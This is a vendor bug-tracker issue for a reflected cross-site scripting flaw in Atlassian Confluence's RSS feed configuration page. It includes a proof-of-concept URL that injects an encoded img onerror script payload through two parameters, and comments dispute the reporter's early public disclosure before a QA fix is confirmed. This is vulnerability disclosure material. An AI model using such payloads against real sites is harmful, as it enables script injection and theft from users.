Details

    • Last commented by user?:
      false
    • CVSS Score:
      7.5

      Description

      Filed by Vitaly Osipov [Atlassian] on behalf of Muhammad Waqar.

      
      http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed
      
      

      Works in Firefox.
      note title and labelstring parameters need encoding.

        Attachments

          Issue Links

            Activity

            Hide
            vosipov Vitaly Osipov [Atlassian] added a comment -
            Show
            vosipov Vitaly Osipov [Atlassian] added a comment - Note: Muhammad Waqar published this advisory without coordinating with us http://packetstormsecurity.com/files/122717/Atlassian-Confluence-5.3-Cross-Site-Scripting.html
            Hide
            write.muhammadwaqar Muhammad Waqar added a comment -

            this is because i received notification that bug has been fixed.

            Show
            write.muhammadwaqar Muhammad Waqar added a comment - this is because i received notification that bug has been fixed.
            Hide
            vosipov Vitaly Osipov [Atlassian] added a comment -

            Muhammad Waqar From where did you receive this notification? This issue is still open as you can see.

            Show
            vosipov Vitaly Osipov [Atlassian] added a comment - Muhammad Waqar From where did you receive this notification? This issue is still open as you can see.
            Hide
            write.muhammadwaqar Muhammad Waqar added a comment -

            yes i can see i had received it via email same as like other notifications are arriving.

            Show
            write.muhammadwaqar Muhammad Waqar added a comment - yes i can see i had received it via email same as like other notifications are arriving.
            Hide
            vosipov Vitaly Osipov [Atlassian] added a comment -

            Muhammad Waqar, This is interesting - according the history tab the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab

            Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?

            Show
            vosipov Vitaly Osipov [Atlassian] added a comment - Muhammad Waqar , This is interesting - according the history tab the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?
            Hide
            write.muhammadwaqar Muhammad Waqar added a comment -

            Greetings Osipov,
            At First Look I thought issue might be fixed and so resulted in disclosure. Realized now that it might be tested then.
            I will make sure that this won't happen again. Sorry for the Inconvenience.
            Have a good day!
            Regards,
            Muhammad Waqar

            Show
            write.muhammadwaqar Muhammad Waqar added a comment - Greetings Osipov, At First Look I thought issue might be fixed and so resulted in disclosure. Realized now that it might be tested then. I will make sure that this won't happen again. Sorry for the Inconvenience. Have a good day! Regards, Muhammad Waqar
            Hide
            dblack David Black added a comment -

            I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.

            Show
            dblack David Black added a comment - I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.

              People

              • Votes:
                0 Vote for this issue
                Watchers:
                6 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Last commented:
                  2 years, 46 weeks, 1 day ago